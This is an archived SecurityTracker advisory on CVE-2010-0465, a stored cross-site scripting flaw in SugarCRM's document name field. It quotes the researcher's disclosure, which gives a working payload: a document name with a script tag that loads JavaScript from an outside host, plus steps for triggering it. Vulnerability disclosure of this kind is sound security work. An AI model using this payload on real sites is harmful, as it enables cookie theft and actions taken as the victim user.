SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   SugarSales (SugarCRM) Vendors:   SugarCRM Inc.
SugarCRM Input Validation Flaw in Document Name Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1023722
SecurityTracker URL:  http://securitytracker.com/id/1023722
CVE Reference:   CVE-2010-0465   (Links to External Site)
Date:  Mar 17 2010
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): prior to 5.5.0a and 5.2.0l
Description:   A vulnerability was reported in SugarCRM. A remote user can conduct cross-site scripting attacks.

The software does not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted value that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the SugarCRM software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The document name field is affected in the Documents section.

The vendor was notified on February 18, 2010.

Jeromie Jackson reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the SugarCRM software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has issued a fix (5.5.0a and 5.2.0l).

The vendor's advisory is available at:

http://www.sugarcrm.com/crm/support/documentation/SugarCommunityEdition/5.2/-docs-Release_Notes-Sugar_CommunityEdition_ReleaseNotes_5.2.0l-Sugar_Release_Notes_5.2.0l.html

Vendor URL:  www.sugarcrm.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  SugarCRM Stored XSS vulnerability

Class: Stored Cross Site Scripting (XSS)

CVE: CVE-2010-0465

Remote: Yes 

Local: Yes 

Published: Jan 1, 2010 12:01AM

Timeline: Submission to Mitre: January 29, 2010

Vendor Contact: February 18, 2010

Vendor Response: February 19, 2010

Patch Available: March 10, 2010

Credit: Jeromie Jackson CISSP, CISM

COBIT & ITIL Certified

President- San Diego Open Web Application Security Project (OWASP)

Vice President- San Diego Information Audit & Control Association
(ISACA)

SANS Mentor

Blog: www.JeromieJackson.com

Twitter: www.twitter.com/Security_Sifu


Validated Vulnerable: 

All previous version of SugarCRM prior to 5.5.0a and 5.2.0l 


Discussion: 


A Stored Cross-Site Scripting (XSS) vulnerability was found within
SugarCRM. The vulnerability is exploited through the online Documents
section of the application. By crafting a name that includes XSS code it
is possible to inject malicious data, redirect the user to a bogus
replica of the real website, or other nefariousactivity. 



Exploit: 

There are two ways that have been used to exploit this vulnerability. In
both instances, make a document with the following Document Name: 


pwn3d<SCRIPT SRC="http://www.jeromiejackson.com/sugarcrm.js"></SCRIPT>



Example #1


Within the SugarCRM User Interface (UI) go to the Documents List. Click
on the one just created. This will execute the script. You will see the
script right in the document list- very obvious to most users that
something doesn't look right. The next example is slighly more covert.



Example #2


Within the SugarCRM UI go to the Document List. Hover over the Document
Name you just created, right-click, and then copy the URL location. You
will see the URL does not have any of the scripting, it has been
replaced with queries directly to a Record variable within the
application. This would probably be the tact a Phisher would take.



Solution: 

A patch has been made available via the vendor. It is recommended a
routine to sanitize user input be consistently implemented throughout
the application to mitigate other such occurrences within the
application.





 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC